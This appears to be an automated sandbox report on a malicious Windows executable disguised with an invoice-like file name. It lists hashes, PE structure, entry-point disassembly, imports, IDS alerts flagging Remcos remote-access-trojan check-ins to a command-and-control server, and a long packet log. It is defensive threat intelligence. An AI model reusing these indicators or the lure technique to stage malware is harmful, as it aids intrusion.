SSDEEP: | 1536:sHoiMTmNr5n2YDREJfm7g0ctkXRR7f8zYXJ4l:QoxOHifKciRdf8zYK |
MD5: | 24E44EC408C4FB8B429ADB0EE5869985 |
SHA1: | 1913F35995281FEC0C9F586FD73D6A2F4E64A5CA |
SHA-256: | CF1DB414B602F31A34655222809A3542F96A8FFCF0E43DFDBC341192F8298F71 |
SHA-512: | 76B152A80B4F9537C1CD3FB6209021040946C0E7C75FE907F9B95E9F4446B2F12EF54BE9721DE7B13929DF0E1D555DB38F470D43F9142B4C1B87E74768819425 |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.485444386300452 |
TrID: |
|
File name: | UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe |
File size: | 515'542 bytes |
MD5: | bf56c567703447c78773f3e581a004db |
SHA1: | 80ec3b7f7b5f7e2df367dff512b508a21c682111 |
SHA256: | 01beeda976d48dc4c029032b0113fed68e00a2736cc03667c065f7bf7440eec2 |
SHA512: | b67e817ab691ab8257826b5a90fb7731801765b5e1299f1ee5235aa36065d082a04ca276c735eea0480a5e27382047b488227bd4e887a4176639cd64fd4c2f5b |
SSDEEP: | 12288:fzA/ggggjlFZKqUVReLAu8xzRCf8CzQXX:U/ggggjHZbU5Po0CcXX |
TLSH: | D8B4D1ABEBA0C956CE3C47B4E8B392141B749C562E71CB0F178934106FB77C278A9617 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@ |
Icon Hash: | 82aea280f0fcfc75 |
Entrypoint: | 0x4032a0 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x57017AB6 [Sun Apr 3 20:19:02 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e2a592076b17ef8bfb48b7e03965a3fc |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 0040A2E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004080B0h] |
call dword ptr [004080ACh] |
cmp ax, 00000006h |
je 00007FD728DDDA83h |
push ebx |
call 00007FD728DE0BC4h |
cmp eax, ebx |
je 00007FD728DDDA79h |
push 00000C00h |
call eax |
mov esi, 004082B8h |
push esi |
call 00007FD728DE0B3Eh |
push esi |
call dword ptr [0040815Ch] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007FD728DDDA5Ch |
push ebp |
push 00000009h |
call 00007FD728DE0B96h |
push 00000007h |
call 00007FD728DE0B8Fh |
mov dword ptr [00434EE4h], eax |
call dword ptr [0040803Ch] |
push ebx |
call dword ptr [004082A4h] |
mov dword ptr [00434F98h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 0042B208h |
call dword ptr [00408188h] |
push 0040A2C8h |
push 00433EE0h |
call 00007FD728DE0778h |
call dword ptr [004080A8h] |
mov ebp, 0043F000h |
push eax |
push ebp |
call 00007FD728DE0766h |
push ebx |
call dword ptr [00408174h] |
add word ptr [eax], 0000h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x54000 | 0x283d0 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x637b | 0x6400 | 967d0e18ece4b8dcc63ec9d544660136 | False | 0.671484375 | data | 6.484796945043301 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x14b0 | 0x1600 | d6b0bc2db2de2a3dd996fda6539cef0e | False | 0.4401633522727273 | data | 5.033673390997287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x2afd8 | 0x600 | 2aa587c909999ca52be17d0f1ffbd186 | False | 0.5188802083333334 | data | 4.039551377217298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x35000 | 0x1f000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x54000 | 0x283d0 | 0x28400 | 1ae715fef83c68eac2d6a2aa7a20fec2 | False | 0.28579313858695654 | data | 5.764915315933482 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x54358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.20579971607713238 |
RT_ICON | 0x64b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3141948707168383 |
RT_ICON | 0x6e028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.34639556377079483 |
RT_ICON | 0x734b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.31737128011336796 |
RT_ICON | 0x776d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.42022821576763486 |
RT_ICON | 0x79c80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.46083489681050654 |
RT_ICON | 0x7ad28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.5704918032786885 |
RT_ICON | 0x7b6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6108156028368794 |
RT_DIALOG | 0x7bb18 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x7bc18 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x7bd38 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x7be00 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x7be60 | 0x76 | data | English | United States | 0.7542372881355932 |
RT_VERSION | 0x7bed8 | 0x1b8 | COM executable for DOS | English | United States | 0.5295454545454545 |
RT_MANIFEST | 0x7c090 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384 |
DLL | Import |
---|---|
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/19/24-10:59:11.642641 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49708 | 29871 | 192.168.2.7 | 193.222.96.21 |
04/19/24-11:01:13.847902 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 29871 | 49708 | 193.222.96.21 | 192.168.2.7 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 19, 2024 10:59:09.813107014 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:09.813198090 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:09.813399076 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:09.823961020 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:09.823996067 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.045962095 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.046108007 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.091310024 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.091356993 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.091712952 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.091773033 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.095597029 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.140157938 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.294576883 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.294630051 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.294697046 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.294702053 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.294739008 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.294754028 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.294754028 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.294799089 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.294799089 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.294826984 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.294895887 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.294945002 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.294979095 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.295020103 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.295037031 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.295103073 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.295150042 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.295164108 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.295233011 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.295348883 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.295402050 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.295439959 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.295510054 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.295866013 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.295933008 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.295970917 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296021938 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296036005 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296087980 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296091080 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296114922 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296154976 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296178102 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296350956 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296408892 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296701908 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296757936 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296770096 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296821117 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296825886 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296840906 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296874046 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296895981 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.296905041 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.296967030 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.297544956 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.297601938 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.297614098 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.297679901 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.297686100 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.297698975 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.297736883 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.297760010 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.297771931 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.298060894 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.298073053 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.298127890 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.298542023 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.298599005 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.298610926 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.298666000 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.298703909 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.298721075 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.298748970 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.298774004 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.298795938 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.298815012 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.298841000 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.298880100 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.299335003 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.299391985 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.299405098 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.299454927 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.299463034 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.299475908 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.299504995 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.299525023 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.299536943 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.299602985 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.299613953 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.299674034 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.300292969 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.300360918 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.397352934 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.397455931 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.397485971 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.397526979 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.397557020 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.397578001 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.398019075 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.398065090 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.398081064 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.398108959 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.398160934 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.398185015 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.399034977 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.399075985 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.399101973 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.399115086 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.399144888 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.399174929 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.399841070 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.399876118 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.399902105 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.399914980 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.399940968 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.399976969 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.400736094 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.400779009 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.400795937 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.400809050 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.400836945 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.400859118 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.401911020 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.401949883 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.401968956 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.401981115 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.402008057 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.402034044 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.402849913 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.402889967 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.402904987 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.402919054 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.402944088 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.402968884 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.403250933 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.403306007 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.446619034 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.446681023 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.446726084 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.446758032 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.446785927 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.446813107 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.499330044 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.499418020 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.499674082 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.499737024 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.499743938 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.499761105 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.499795914 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.499814987 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.500235081 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.500299931 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.501060963 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.501121998 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.501147032 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.501209974 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.501935959 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.501981020 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
Apr 19, 2024 10:59:10.502003908 CEST | 49707 | 443 | 192.168.2.7 | 172.67.191.112 |
Apr 19, 2024 10:59:10.502017021 CEST | 443 | 49707 | 172.67.191.112 | 192.168.2.7 |
